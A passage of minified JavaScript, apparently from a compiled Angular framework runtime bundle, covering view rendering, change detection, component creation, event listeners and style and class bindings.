i=0;i<e.length;i++){const n=e[i],r=n[3];0==(512&n[2])&&sd(r,1),n[2]|=512}}}(a),function Ute(t){for(let a=IE(t);null!==a;a=RE(a))for(let e=10;e<a.length;e++){const i=a[e],n=i[1];Um(i)&&Cv(n,i,n.template,i[8])}}(a),null!==t.contentQueries&&GR(t,a),c){const k=t.contentCheckHooks;null!==k&&ji(a,k)}else{const k=t.contentHooks;null!==k&&Zu(a,k,1),M_(a,1)}!function Ete(t,a){const e=t.hostBindingOpCodes;if(null!==e)try{for(let i=0;i<e.length;i++){const n=e[i];if(n<0)hl(~n);else{const r=n,c=e[++i],d=e[++i];Gm(c,r),d(2,a[r])}}}finally{hl(-1)}}(t,a);const d=t.components;null!==d&&function Dte(t,a){for(let e=0;e<a.length;e++)Gte(t,a[e])}(a,d);const T=t.viewQuery;if(null!==T&&cD(2,T,i),c){const k=t.viewCheckHooks;null!==k&&ji(a,k)}else{const k=t.viewHooks;null!==k&&Zu(a,k,2),M_(a,2)}!0===t.firstUpdatePass&&(t.firstUpdatePass=!1),a[2]&=-41,512&a[2]&&(a[2]&=-513,sd(a[3],-1))}finally{b_()}}}function jR(t,a,e,i,n){const r=Ss(),c=2&i;try{hl(-1),c&&a.length>22&&AR(t,a,22,!1),e(i,n)}finally{hl(r)}}function QR(t,a,e){if(Gu(a)){const n=a.directiveEnd;for(let r=a.directiveStart;r<n;r++){const c=t.data[r];c.contentQueries&&c.contentQueries(1,e[r],r)}}}function tD(t,a,e){!Ku()||(function Nte(t,a,e,i){const n=e.directiveStart,r=e.directiveEnd;t.firstCreatePass||ah(e,a),bc(i,a);const c=e.initialInputs;for(let d=n;d<r;d++){const T=t.data[d],k=gr(T);k&&Vte(a,e,T);const q=Xm(a,t,d,e);bc(q,a),null!==c&&Bte(0,d-n,q,T,0,c),k&&(hs(e.index,a)[8]=q)}}(t,a,e,pc(e,a)),128==(128&e.flags)&&function Lte(t,a,e){const i=e.directiveStart,n=e.directiveEnd,r=e.index,c=function nC(){return Ua.lFrame.currentDirectiveIndex}();try{hl(r);for(let d=i;d<n;d++){const T=t.data[d],k=a[d];__(d),(null!==T.hostBindings||0!==T.hostVars||null!==T.hostAttrs)&&eS(T,k)}}finally{hl(-1),__(c)}}(t,a,e))}function iD(t,a,e=pc){const i=a.localNames;if(null!==i){let n=a.index+1;for(let r=0;r<i.length;r+=2){const c=i[r+1],d=-1===c?e(a,t):t[c];t[n++]=d}}}function $R(t){const a=t.tView;return null===a||a.incompleteFirstPass?t.tView=aD(1,null,t.template,t.decls,t.vars,t.directiveDefs,t.pipeDefs,t.viewQuery,t.schemas,t.consts):a}function aD(t,a,e,i,n,r,c,d,T,k){const q=22+i,Y=q+n,te=function wte(t,a){const e=[];for(let i=0;i<a;i++)e.push(i<t?null:mn);return e}(q,Y),pe="function"==typeof k?k():k;return te[1]={type:t,blueprint:te,template:e,queries:null,viewQuery:d,declTNode:a,data:te.slice().fill(null,q),bindingStartIndex:q,expandoStartIndex:Y,hostBindingOpCodes:null,firstCreatePass:!0,firstUpdatePass:!0,staticViewQueries:!1,staticContentQueries:!1,preOrderHooks:null,preOrderCheckHooks:null,contentHooks:null,contentCheckHooks:null,viewHooks:null,viewCheckHooks:null,destroyHooks:null,cleanup:null,contentQueries:null,components:null,directiveRegistry:"function"==typeof r?r():r,pipeRegistry:"function"==typeof c?c():c,firstChild:null,schemas:T,consts:pe,incompleteFirstPass:!1}}function KR(t,a,e,i){const n=oS(a);null===e?n.push(i):(n.push(e),t.firstCreatePass&&rS(t).push(i,n.length-1))}function XR(t,a,e){for(let i in t)if(t.hasOwnProperty(i)){const n=t[i];(e=null===e?{}:e).hasOwnProperty(i)?e[i].push(a,n):e[i]=[a,n]}return e}function YR(t,a){const i=a.directiveEnd,n=t.data,r=a.attrs,c=[];let d=null,T=null;for(let k=a.directiveStart;k<i;k++){const q=n[k],Y=q.inputs,te=null===r||bR(a)?null:Hte(Y,r);c.push(te),d=XR(Y,k,d),T=XR(q.outputs,k,T)}null!==d&&(d.hasOwnProperty("class")&&(a.flags|=16),d.hasOwnProperty("style")&&(a.flags|=32)),a.initialInputs=c,a.inputs=d,a.outputs=T}function ql(t,a,e,i,n,r,c,d){const T=pc(a,e);let q,k=a.inputs;!d&&null!=k&&(q=k[i])?(lD(t,e,q,i,n),dl(a)&&JR(e,a.index)):3&a.type&&(i=function Ste(t){return"class"===t?"className":"for"===t?"htmlFor":"formaction"===t?"formAction":"innerHtml"===t?"innerHTML":"readonly"===t?"readOnly":"tabindex"===t?"tabIndex":t}(i),n=null!=c?c(n,a.value||"",i):n,r.setProperty(T,i,n))}function JR(t,a){const e=hs(a,t);16&e[2]||(e[2]|=32)}function nD(t,a,e,i){let n=!1;if(Ku()){const r=function zte(t,a,e){const i=t.directiveRegistry;let n=null;if(i)for(let r=0;r<i.length;r++){const c=i[r];MR(e,c.selectors,!1)&&(n||(n=[]),Km(ah(e,a),t,c.type),gr(c)?(tS(t,e),n.unshift(c)):n.push(c))}return n}(t,a,e),c=null===i?null:{"":-1};if(null!==r){n=!0,iS(e,t.data.length,r.length);for(let q=0;q<r.length;q++){const Y=r[q];Y.providersResolver&&Y.providersResolver(Y)}let d=!1,T=!1,k=K0(t,a,r.length,null);for(let q=0;q<r.length;q++){const Y=r[q];e.mergedAttrs=jm(e.mergedAttrs,Y.hostAttrs),aS(t,e,a,k,Y),Fte(k,Y,c),null!==Y.contentQueries&&(e.flags|=8),(null!==Y.hostBindings||null!==Y.hostAttrs||0!==Y.hostVars)&&(e.flags|=128);const te=Y.type.prototype;!d&&(te.ngOnChanges||te.ngOnInit||te.ngDoCheck)&&((t.preOrderHooks||(t.preOrderHooks=[])).push(e.index),d=!0),!T&&(te.ngOnChanges||te.ngDoCheck)&&((t.preOrderCheckHooks||(t.preOrderCheckHooks=[])).push(e.index),T=!0),k++}YR(t,e)}c&&function Wte(t,a,e){if(a){const i=t.localNames=[];for(let n=0;n<a.length;n+=2){const r=e[a[n+1]];if(null==r)throw new gi(-301,!1);i.push(a[n],r)}}}(e,i,c)}return e.mergedAttrs=jm(e.mergedAttrs,e.attrs),n}function ZR(t,a,e,i,n,r){const c=r.hostBindings;if(c){let d=t.hostBindingOpCodes;null===d&&(d=t.hostBindingOpCodes=[]);const T=~a.index;(function Ote(t){let a=t.length;for(;a>0;){const e=t[--a];if("number"==typeof e&&e<0)return e}return 0})(d)!=T&&d.push(T),d.push(i,n,c)}}function eS(t,a){null!==t.hostBindings&&t.hostBindings(1,a)}function tS(t,a){a.flags|=2,(t.components||(t.components=[])).push(a.index)}function Fte(t,a,e){if(e){if(a.exportAs)for(let i=0;i<a.exportAs.length;i++)e[a.exportAs[i]]=t;gr(a)&&(e[""]=t)}}function iS(t,a,e){t.flags|=1,t.directiveStart=a,t.directiveEnd=a+e,t.providerIndexes=a}function aS(t,a,e,i,n){t.data[i]=n;const r=n.factory||(n.factory=Qd(n.type)),c=new dd(r,gr(n),Ee);t.blueprint[i]=c,e[i]=c,ZR(t,a,0,i,K0(t,e,n.hostVars,mn),n)}function Vte(t,a,e){const i=pc(a,t),n=$R(e),r=t[10],c=yv(t,gv(t,n,null,e.onPush?32:16,i,a,r,r.createRenderer(i,e),null,null,null));t[a.index]=c}function iu(t,a,e,i,n,r){const c=pc(t,a);!function oD(t,a,e,i,n,r,c){if(null==r)t.removeAttribute(a,n,e);else{const d=null==c?Qa(r):c(r,i||"",n);t.setAttribute(a,n,d,e)}}(a[11],c,r,t.value,e,i,n)}function Bte(t,a,e,i,n,r){const c=r[a];if(null!==c){const d=i.setInput;for(let T=0;T<c.length;){const k=c[T++],q=c[T++],Y=c[T++];null!==d?i.setInput(e,Y,k,q):e[q]=Y}}}function Hte(t,a){let e=null,i=0;for(;i<a.length;){const n=a[i];if(0!==n)if(5!==n){if("number"==typeof n)break;t.hasOwnProperty(n)&&(null===e&&(e=[]),e.push(n,t[n],a[i+1])),i+=2}else i+=2;else i+=4}return e}function nS(t,a,e,i){return new Array(t,!0,!1,a,null,0,i,e,null,null)}function Gte(t,a){const e=hs(a,t);if(Um(e)){const i=e[1];48&e[2]?Cv(i,e,i.template,e[8]):e[5]>0&&rD(e)}}function rD(t){for(let i=IE(t);null!==i;i=RE(i))for(let n=10;n<i.length;n++){const r=i[n];if(Um(r))if(512&r[2]){const c=r[1];Cv(c,r,c.template,r[8])}else r[5]>0&&rD(r)}const e=t[1].components;if(null!==e)for(let i=0;i<e.length;i++){const n=hs(e[i],t);Um(n)&&n[5]>0&&rD(n)}}function jte(t,a){const e=hs(a,t),i=e[1];(function Qte(t,a){for(let e=a.length;e<t.blueprint.length;e++)a.push(t.blueprint[e])})(i,e),eD(i,e,e[8])}function yv(t,a){return t[13]?t[14][4]=a:t[13]=a,t[14]=a,a}function sD(t){for(;t;){t[2]|=32;const a=WC(t);if(s0(t)&&!a)return t;t=a}return null}function bv(t,a,e,i=!0){const n=a[10];n.begin&&n.begin();try{Cv(t,a,t.template,e)}catch(c){throw i&&cS(a,c),c}finally{n.end&&n.end()}}function cD(t,a,e){g_(0),a(t,e)}function oS(t){return t[7]||(t[7]=[])}function rS(t){return t.cleanup||(t.cleanup=[])}function sS(t,a,e){return(null===t||gr(t))&&(e=function J2(t){for(;Array.isArray(t);){if("object"==typeof t[1])return t;t=t[0]}return null}(e[a.index])),e[11]}function cS(t,a){const e=t[9],i=e?e.get(yh,null):null;i&&i.handleError(a)}function lD(t,a,e,i,n){for(let r=0;r<e.length;){const c=e[r++],d=e[r++],T=a[c],k=t.data[c];null!==k.setInput?k.setInput(T,n,i,d):T[d]=n}}function vh(t,a,e){const i=$d(a,t);!function aR(t,a,e){t.setValue(a,e)}(t[11],i,e)}function Mv(t,a,e){let i=e?t.styles:null,n=e?t.classes:null,r=0;if(null!==a)for(let c=0;c<a.length;c++){const d=a[c];"number"==typeof d?r=d:1==r?n=ss(n,d):2==r&&(i=ss(i,d+": "+a[++c]+";"))}e?t.styles=i:t.stylesWithoutHost=i,e?t.classes=n:t.classesWithoutHost=n}function vv(t,a,e,i,n=!1){for(;null!==e;){const r=a[e.index];if(null!==r&&i.push(Ar(r)),Is(r))for(let d=10;d<r.length;d++){const T=r[d],k=T[1].firstChild;null!==k&&vv(T[1],T,k,i)}const c=e.type;if(8&c)vv(t,a,e.child,i);else if(32&c){const d=wE(e,a);let T;for(;T=d();)i.push(T)}else if(16&c){const d=fR(a,e);if(Array.isArray(d))i.push(...d);else{const T=WC(a[16]);vv(T[1],T,d,i,!0)}}e=n?e.projectionNext:e.next}return i}class VC{constructor(a,e){this._lView=a,this._cdRefInjectingView=e,this._appRef=null,this._attachedToViewContainer=!1}get rootNodes(){const a=this._lView,e=a[1];return vv(e,a,e.firstChild,[])}get context(){return this._lView[8]}set context(a){this._lView[8]=a}get destroyed(){return 128==(128&this._lView[2])}destroy(){if(this._appRef)this._appRef.detachView(this);else if(this._attachedToViewContainer){const a=this._lView[3];if(Is(a)){const e=a[8],i=e?e.indexOf(this):-1;i>-1&&(PE(a,i),rh(e,i))}this._attachedToViewContainer=!1}oR(this._lView[1],this._lView)}onDestroy(a){KR(this._lView[1],this._lView,null,a)}markForCheck(){sD(this._cdRefInjectingView||this._lView)}detach(){this._lView[2]&=-65}reattach(){this._lView[2]|=64}detectChanges(){bv(this._lView[1],this._lView,this.context)}checkNoChanges(){}attachToViewContainerRef(){if(this._appRef)throw new gi(902,!1);this._attachedToViewContainer=!0}detachFromAppRef(){this._appRef=null,function Iee(t,a){FC(t,a,a[11],2,null,null)}(this._lView[1],this._lView)}attachToAppRef(a){if(this._attachedToViewContainer)throw new gi(902,!1);this._appRef=a}}class $te extends VC{constructor(a){super(a),this._view=a}detectChanges(){const a=this._view;bv(a[1],a,a[8],!1)}checkNoChanges(){}get context(){return null}}class dD extends On{constructor(a){super(),this.ngModule=a}resolveComponentFactory(a){const e=Un(a);return new BC(e,this.ngModule)}}function lS(t){const a=[];for(let e in t)t.hasOwnProperty(e)&&a.push({propName:t[e],templateName:e});return a}class Xte{constructor(a,e){this.injector=a,this.parentInjector=e}get(a,e,i){const n=this.injector.get(a,Ul,i);return n!==Ul||e===Ul?n:this.parentInjector.get(a,e,i)}}class BC extends Yn{constructor(a,e){super(),this.componentDef=a,this.ngModule=e,this.componentType=a.type,this.selector=function Kee(t){return t.map($ee).join(",")}(a.selectors),this.ngContentSelectors=a.ngContentSelectors?a.ngContentSelectors:[],this.isBoundToModule=!!e}get inputs(){return lS(this.componentDef.inputs)}get outputs(){return lS(this.componentDef.outputs)}create(a,e,i,n){let r=(n=n||this.ngModule)instanceof Ht?n:null==n?void 0:n.injector;r&&null!==this.componentDef.getStandaloneInjector&&(r=this.componentDef.getStandaloneInjector(r)||r);const c=r?new Xte(a,r):a,d=c.get(qs,null);if(null===d)throw new gi(407,!1);const T=c.get(gh,null),k=d.createRenderer(null,this.componentDef),q=this.componentDef.selectors[0][0]||"div",Y=i?function Ite(t,a,e){return t.selectRootElement(a,e===dc.ShadowDom)}(k,i,this.componentDef.encapsulation):kE(d.createRenderer(null,this.componentDef),q,function Kte(t){const a=t.toLowerCase();return"svg"===a?"svg":"math"===a?"math":null}(q)),te=this.componentDef.onPush?288:272,pe=aD(0,null,null,1,0,null,null,null,null,null),Re=gv(null,pe,null,te,null,null,d,k,T,c,null);let Fe,Ne;C_(Re);try{const et=function Zte(t,a,e,i,n,r){const c=e[1];e[22]=t;const T=$0(c,22,2,"#host",null),k=T.mergedAttrs=a.hostAttrs;null!==k&&(Mv(T,k,!0),null!==t&&(Nf(n,t,k),null!==T.classes&&WE(n,t,T.classes),null!==T.styles&&gR(n,t,T.styles)));const q=i.createRenderer(t,a),Y=gv(e,$R(a),null,a.onPush?32:16,e[22],T,i,q,r||null,null,null);return c.firstCreatePass&&(Km(ah(T,e),c,a.type),tS(c,T),iS(T,e.length,1)),yv(e,Y),e[22]=Y}(Y,this.componentDef,Re,d,k);if(Y)if(i)Nf(k,Y,["ng-version",Ch.full]);else{const{attrs:ut,classes:Ze}=function Xee(t){const a=[],e=[];let i=1,n=2;for(;i<t.length;){let r=t[i];if("string"==typeof r)2===n?""!==r&&a.push(r,t[++i]):8===n&&e.push(r);else{if(!om(n))break;n=r}i++}return{attrs:a,classes:e}}(this.componentDef.selectors[0]);ut&&Nf(k,Y,ut),Ze&&Ze.length>0&&WE(k,Y,Ze.join(" "))}if(Ne=d_(pe,22),void 0!==e){const ut=Ne.projection=[];for(let Ze=0;Ze<this.ngContentSelectors.length;Ze++){const yt=e[Ze];ut.push(null!=yt?Array.from(yt):null)}}Fe=function eie(t,a,e,i){const n=e[1],r=function Pte(t,a,e){const i=or();t.firstCreatePass&&(e.providersResolver&&e.providersResolver(e),aS(t,i,a,K0(t,a,1,null),e),YR(t,i));const n=Xm(a,t,i.directiveStart,i);bc(n,a);const r=pc(i,a);return r&&bc(r,a),n}(n,e,a);if(t[8]=e[8]=r,null!==i)for(const d of i)d(r,a);if(a.contentQueries){const d=or();a.contentQueries(1,r,d.directiveStart)}const c=or();return!n.firstCreatePass||null===a.hostBindings&&null===a.hostAttrs||(hl(c.index),ZR(e[1],c,0,c.directiveStart,c.directiveEnd,a),eS(a,r)),r}(et,this.componentDef,Re,[tie]),eD(pe,Re,null)}finally{b_()}return new Jte(this.componentType,Fe,jc(Ne,Re),Re,Ne)}}class Jte extends class ro{}{constructor(a,e,i,n,r){super(),this.location=i,this._rootLView=n,this._tNode=r,this.instance=e,this.hostView=this.changeDetectorRef=new $te(n),this.componentType=a}setInput(a,e){const i=this._tNode.inputs;let n;if(null!==i&&(n=i[a])){const r=this._rootLView;lD(r[1],r,n,a,e),JR(r,this._tNode.index)}}get injector(){return new Ym(this._tNode,this._rootLView)}destroy(){this.hostView.destroy()}onDestroy(a){this.hostView.onDestroy(a)}}function tie(){const t=or();Ju(bi()[1],t)}function ci(t){let a=function dS(t){return Object.getPrototypeOf(t.prototype).constructor}(t.type),e=!0;const i=[t];for(;a;){let n;if(gr(t))n=a.\u0275cmp||a.\u0275dir;else{if(a.\u0275cmp)throw new gi(903,!1);n=a.\u0275dir}if(n){if(e){i.push(n);const c=t;c.inputs=mD(t.inputs),c.declaredInputs=mD(t.declaredInputs),c.outputs=mD(t.outputs);const d=n.hostBindings;d&&oie(t,d);const T=n.viewQuery,k=n.contentQueries;if(T&&aie(t,T),k&&nie(t,k),Hd(t.inputs,n.inputs),Hd(t.declaredInputs,n.declaredInputs),Hd(t.outputs,n.outputs),gr(n)&&n.data.animation){const q=t.data;q.animation=(q.animation||[]).concat(n.data.animation)}}const r=n.features;if(r)for(let c=0;c<r.length;c++){const d=r[c];d&&d.ngInherit&&d(t),d===ci&&(e=!1)}}a=Object.getPrototypeOf(a)}!function iie(t){let a=0,e=null;for(let i=t.length-1;i>=0;i--){const n=t[i];n.hostVars=a+=n.hostVars,n.hostAttrs=jm(n.hostAttrs,e=jm(e,n.hostAttrs))}}(i)}function mD(t){return t===Ud?{}:t===Xn?[]:t}function aie(t,a){const e=t.viewQuery;t.viewQuery=e?(i,n)=>{a(i,n),e(i,n)}:a}function nie(t,a){const e=t.contentQueries;t.contentQueries=e?(i,n,r)=>{a(i,n,r),e(i,n,r)}:a}function oie(t,a){const e=t.hostBindings;t.hostBindings=e?(i,n)=>{a(i,n),e(i,n)}:a}let Av=null;function K_(){if(!Av){const t=vo.Symbol;if(t&&t.iterator)Av=t.iterator;else{const a=Object.getOwnPropertyNames(Map.prototype);for(let e=0;e<a.length;++e){const i=a[e];"entries"!==i&&"size"!==i&&Map.prototype[i]===Map.prototype.entries&&(Av=i)}}}return Av}function HC(t){return!!uD(t)&&(Array.isArray(t)||!(t instanceof Map)&&K_()in t)}function uD(t){return null!==t&&("function"==typeof t||"object"==typeof t)}function au(t,a,e){return t[a]=e}function Mc(t,a,e){return!Object.is(t[a],e)&&(t[a]=e,!0)}function X_(t,a,e,i){const n=Mc(t,a,e);return Mc(t,a+1,i)||n}function Rt(t,a,e,i){const n=bi();return Mc(n,cd(),a)&&(Rn(),iu(rr(),n,t,a,e,i)),Rt}function Y0(t,a,e,i){return Mc(t,cd(),e)?a+Qa(e)+i:mn}function J0(t,a,e,i,n,r){const d=X_(t,ml(),e,n);return ul(2),d?a+Qa(e)+i+Qa(n)+r:mn}function Z0(t,a,e,i,n,r,c,d){const k=function Tv(t,a,e,i,n){const r=X_(t,a,e,i);return Mc(t,a+2,n)||r}(t,ml(),e,n,c);return ul(3),k?a+Qa(e)+i+Qa(n)+r+Qa(c)+d:mn}function ne(t,a,e,i,n,r,c,d){const T=bi(),k=Rn(),q=t+22,Y=k.firstCreatePass?function hie(t,a,e,i,n,r,c,d,T){const k=a.consts,q=$0(a,t,4,c||null,Rs(k,d));nD(a,e,q,Rs(k,T)),Ju(a,q);const Y=q.tViews=aD(2,q,i,n,r,a.directiveRegistry,a.pipeRegistry,null,a.schemas,k);return null!==a.queries&&(a.queries.template(a,q),Y.queries=a.queries.embeddedTView(q)),q}(q,k,T,a,e,i,n,r,c):k.data[q];_c(Y,!1);const te=T[11].createComment("");mv(k,T,te,Y),bc(te,T),yv(T,T[q]=nS(te,T,te,Y)),uc(Y)&&tD(k,T,Y),null!=c&&iD(T,Y,d)}function Ti(t){return Lc(function _0(){return Ua.lFrame.contextLView}(),22+t)}function V(t,a,e){const i=bi();return Mc(i,cd(),a)&&ql(Rn(),rr(),i,t,a,i[11],e,!1),V}function hD(t,a,e,i,n){const c=n?"class":"style";lD(t,e,a.inputs[c],c,i)}function m(t,a,e,i){const n=bi(),r=Rn(),c=22+t,d=n[11],T=n[c]=kE(d,a,function lC(){return Ua.lFrame.currentNamespace}()),k=r.firstCreatePass?function _ie(t,a,e,i,n,r,c){const d=a.consts,k=$0(a,t,2,n,Rs(d,r));return nD(a,e,k,Rs(d,c)),null!==k.attrs&&Mv(k,k.attrs,!1),null!==k.mergedAttrs&&Mv(k,k.mergedAttrs,!0),null!==a.queries&&a.queries.elementStart(a,k),k}(c,r,n,0,a,e,i):r.data[c];_c(k,!0);const q=k.mergedAttrs;null!==q&&Nf(d,T,q);const Y=k.classes;null!==Y&&WE(d,T,Y);const te=k.styles;return null!==te&&gR(d,T,te),64!=(64&k.flags)&&mv(r,n,T,k),0===function h_(){return Ua.lFrame.elementDepthCount}()&&bc(T,n),function iC(){Ua.lFrame.elementDepthCount++}(),uc(k)&&(tD(r,n,k),QR(r,k,n)),null!==i&&iD(n,k),m}function u(){let t=or();Xu()?Yu():(t=t.parent,_c(t,!1));const a=t;!function Sf(){Ua.lFrame.elementDepthCount--}();const e=Rn();return e.firstCreatePass&&(Ju(e,t),Gu(t)&&e.queries.elementEnd(t)),null!=a.classesWithoutHost&&function mC(t){return 0!=(16&t.flags)}(a)&&hD(e,a,bi(),a.classesWithoutHost,!0),null!=a.stylesWithoutHost&&function Yd(t){return 0!=(32&t.flags)}(a)&&hD(e,a,bi(),a.stylesWithoutHost,!1),u}function it(t,a,e,i){return m(t,a,e,i),u(),it}function bt(t,a,e){const i=bi(),n=Rn(),r=t+22,c=n.firstCreatePass?function gie(t,a,e,i,n){const r=a.consts,c=Rs(r,i),d=$0(a,t,8,"ng-container",c);return null!==c&&Mv(d,c,!0),nD(a,e,d,Rs(r,n)),null!==a.queries&&a.queries.elementStart(a,d),d}(r,n,i,a,e):n.data[r];_c(c,!0);const d=i[r]=i[11].createComment("");return mv(n,i,d,c),bc(d,i),uc(c)&&(tD(n,i,c),QR(n,c,i)),null!=e&&iD(i,c),bt}function Mt(){let t=or();const a=Rn();return Xu()?Yu():(t=t.parent,_c(t,!1)),a.firstCreatePass&&(Ju(a,t),Gu(t)&&a.queries.elementEnd(t)),Mt}function Ir(t,a,e){return bt(t,a,e),Mt(),Ir}function Ye(){return bi()}function qC(t){return!!t&&"function"==typeof t.then}function bS(t){return!!t&&"function"==typeof t.subscribe}const fD=bS;function he(t,a,e,i){const n=bi(),r=Rn(),c=or();return MS(r,n,n[11],c,t,a,0,i),he}function GC(t,a){const e=or(),i=bi(),n=Rn();return MS(n,i,sS(Pf(n.data),e,i),e,t,a),GC}function MS(t,a,e,i,n,r,c,d){const T=uc(i),q=t.firstCreatePass&&rS(t),Y=a[8],te=oS(a);let pe=!0;if(3&i.type||d){const Ne=pc(i,a),et=d?d(Ne):Ne,ut=te.length,Ze=d?It=>d(Ar(It[i.index])):i.index;let yt=null;if(!d&&T&&(yt=function Cie(t,a,e,i){const n=t.cleanup;if(null!=n)for(let r=0;r<n.length-1;r+=2){const c=n[r];if(c===e&&n[r+1]===i){const d=a[7],T=n[r+2];return d.length>T?d[T]:null}"string"==typeof c&&(r+=2)}return null}(t,a,n,i.index)),null!==yt)(yt.__ngLastListenerFn__||yt).__ngNextListenerFn__=r,yt.__ngLastListenerFn__=r,pe=!1;else{r=AS(i,a,Y,r,!1);const It=e.listen(et,n,r);te.push(r,It),q&&q.push(n,Ze,ut,ut+1)}}else r=AS(i,a,Y,r,!1);const Re=i.outputs;let Fe;if(pe&&null!==Re&&(Fe=Re[n])){const Ne=Fe.length;if(Ne)for(let et=0;et<Ne;et+=2){const St=a[Fe[et]][Fe[et+1]].subscribe(r),Nt=te.length;te.push(r,St),q&&q.push(n,i.index,Nt,-(Nt+1))}}}function vS(t,a,e,i){try{return!1!==e(i)}catch(n){return cS(t,n),!1}}function AS(t,a,e,i,n){return function r(c){if(c===Function)return i;sD(2&t.flags?hs(t.index,a):a);let T=vS(a,0,i,c),k=r.__ngNextListenerFn__;for(;k;)T=vS(a,0,k,c)&&T,k=k.__ngNextListenerFn__;return n&&!1===T&&(c.preventDefault(),c.returnValue=!1),T}}function B(t=1){return function oC(t){return(Ua.lFrame.contextLView=function rC(t,a){for(;t>0;)a=a[15],t--;return a}(t,Ua.lFrame.contextLView))[8]}(t)}function yie(t,a){let e=null;const i=function qee(t){const a=t.attrs;if(null!=a){const e=a.indexOf(5);if(0==(1&e))return a[e+1]}return null}(t);for(let n=0;n<a.length;n++){const r=a[n];if("*"!==r){if(null===i?MR(t,r,!0):Qee(i,r))return n}else e=n}return e}function Jn(t){const a=bi()[16][6];if(!a.projection){const i=a.projection=hd(t?t.length:1,null),n=i.slice();let r=a.child;for(;null!==r;){const c=t?yie(r,t):0;null!==c&&(n[c]?n[c].projectionNext=r:i[c]=r,n[c]=r),r=r.next}}}function va(t,a=0,e){const i=bi(),n=Rn(),r=$0(n,22+t,16,null,e||null);null===r.projection&&(r.projection=a),Yu(),64!=(64&r.flags)&&function zee(t,a,e){_R(a[11],0,a,e,rR(t,e,a),dR(e.parent||a[6],e,a))}(n,i,r)}function at(t,a,e){return pD(t,"",a,"",e),at}function pD(t,a,e,i,n){const r=bi(),c=Y0(r,a,e,i);return c!==mn&&ql(Rn(),rr(),r,t,c,r[11],n,!1),pD}function Kc(t,a,e,i,n,r,c){const d=bi(),T=J0(d,a,e,i,n,r);return T!==mn&&ql(Rn(),rr(),d,t,T,d[11],c,!1),Kc}function SS(t,a,e,i,n){const r=t[e+1],c=null===a;let d=i?rm(r):Mh(r),T=!1;for(;0!==d&&(!1===T||c);){const q=t[d+1];vie(t[d],a)&&(T=!0,t[d+1]=i?GE(q):UE(q)),d=i?rm(q):Mh(q)}T&&(t[e+1]=i?UE(r):GE(r))}function vie(t,a){return null===t||null==a||(Array.isArray(t)?t[1]:t)===a||!(!Array.isArray(t)||"string"!=typeof a)&&Cl(t,a)>=0}const Os={textEnd:0,key:0,keyEnd:0,value:0,valueEnd:0};function kS(t){return t.substring(Os.key,Os.keyEnd)}function Aie(t){return t.substring(Os.value,Os.valueEnd)}function PS(t,a){const e=Os.textEnd;return e===a?-1:(a=Os.keyEnd=function Die(t,a,e){for(;a<e&&t.charCodeAt(a)>32;)a++;return a}(t,Os.key=a,e),r1(t,a,e))}function OS(t,a){const e=Os.textEnd;let i=Os.key=r1(t,a,e);return e===i?-1:(i=Os.keyEnd=function xie(t,a,e){let i;for(;a<e&&(45===(i=t.charCodeAt(a))||95===i||(-33&i)>=65&&(-33&i)<=90||i>=48&&i<=57);)a++;return a}(t,i,e),i=LS(t,i,e),i=Os.value=r1(t,i,e),i=Os.valueEnd=function wie(t,a,e){let i=-1,n=-1,r=-1,c=a,d=c;for(;c<e;){const T=t.charCodeAt(c++);if(59===T)return d;34===T||39===T?d=c=zS(t,T,c,e):a===c-4&&85===r&&82===n&&76===i&&40===T?d=c=zS(t,41,c,e):T>32&&(d=c),r=n,n=i,i=-33&T}return d}(t,i,e),LS(t,i,e))}function NS(t){Os.key=0,Os.keyEnd=0,Os.value=0,Os.valueEnd=0,Os.textEnd=t.length}function r1(t,a,e){for(;a<e&&t.charCodeAt(a)<=32;)a++;return a}function LS(t,a,e,i){return(a=r1(t,a,e))<e&&a++,a}function zS(t,a,e,i){let n=-1,r=e;for(;r<i;){const c=t.charCodeAt(r++);if(c==a&&92!==n)return r;n=92==c&&92===n?0:c}throw new Error}function ri(t,a,e){return sm(t,a,e,!1),ri}function Ct(t,a){return sm(t,a,null,!0),Ct}function Iie(t,a){for(let e=function Eie(t){return NS(t),OS(t,r1(t,0,Os.textEnd))}(a);e>=0;e=OS(a,e))VS(t,kS(a),Aie(a))}function _D(t){cm(_s,ou,t,!0)}function ou(t,a){for(let e=function Tie(t){return NS(t),PS(t,r1(t,0,Os.textEnd))}(a);e>=0;e=PS(a,e))_s(t,kS(a),!0)}function sm(t,a,e,i){const n=bi(),r=Rn(),c=ul(2);r.firstUpdatePass&&FS(r,t,c,i),a!==mn&&Mc(n,c,a)&&BS(r,r.data[Ss()],n,n[11],t,n[c+1]=function Lie(t,a){return null==t||("string"==typeof a?t+=a:"object"==typeof t&&(t=Wo(Hc(t)))),t}(a,e),i,c)}function cm(t,a,e,i){const n=Rn(),r=ul(2);n.firstUpdatePass&&FS(n,null,r,i);const c=bi();if(e!==mn&&Mc(c,r,e)){const d=n.data[Ss()];if(US(d,i)&&!WS(n,r)){let T=i?d.classesWithoutHost:d.stylesWithoutHost;null!==T&&(e=ss(T,e||"")),hD(n,d,c,e,i)}else!function Nie(t,a,e,i,n,r,c,d){n===mn&&(n=Xn);let T=0,k=0,q=0<n.length?n[0]:null,Y=0<r.length?r[0]:null;for(;null!==q||null!==Y;){const te=T<n.length?n[T+1]:void 0,pe=k<r.length?r[k+1]:void 0;let Fe,Re=null;q===Y?(T+=2,k+=2,te!==pe&&(Re=Y,Fe=pe)):null===Y||null!==q&&q<Y?(T+=2,Re=q):(k+=2,Re=Y,Fe=pe),null!==Re&&BS(t,a,e,i,Re,Fe,c,d),q=T<n.length?n[T]:null,Y=k<r.length?r[k]:null}}(n,d,c,c[11],c[r+1],c[r+1]=function Oie(t,a,e){if(null==e||""===e)return Xn;const i=[],n=Hc(e);if(Array.isArray(n))for(let r=0;r<n.length;r++)t(i,n[r],!0);else if("object"==typeof n)for(const r in n)n.hasOwnProperty(r)&&t(i,r,n[r]);else"string"==typeof n&&a(i,n);return i}(t,a,e),i,r)}}function WS(t,a){return a>=t.expandoStartIndex}function FS(t,a,e,i){const n=t.data;if(null===n[e+1]){const r=n[Ss()],c=WS(t,e);US(r,i)&&null===a&&!c&&(a=!1),a=function Rie(t,a,e,i){const n=Pf(t);let r=i?a.residualClasses:a.residualStyles;if(null===n)0===(i?a.classBindings:a.styleBindings)&&(e=jC(e=gD(null,t,a,e,i),a.attrs,i),r=null);else{const c=a.directiveStylingLast;if(-1===c||t[c]!==n)if(e=gD(n,t,a,e,i),null===r){let T=function Sie(t,a,e){const i=e?a.classBindings:a.styleBindings;if(0!==Mh(i))return t[rm(i)]}(t,a,i);void 0!==T&&Array.isArray(T)&&(T=gD(null,t,a,T[1],i),T=jC(T,a.attrs,i),function 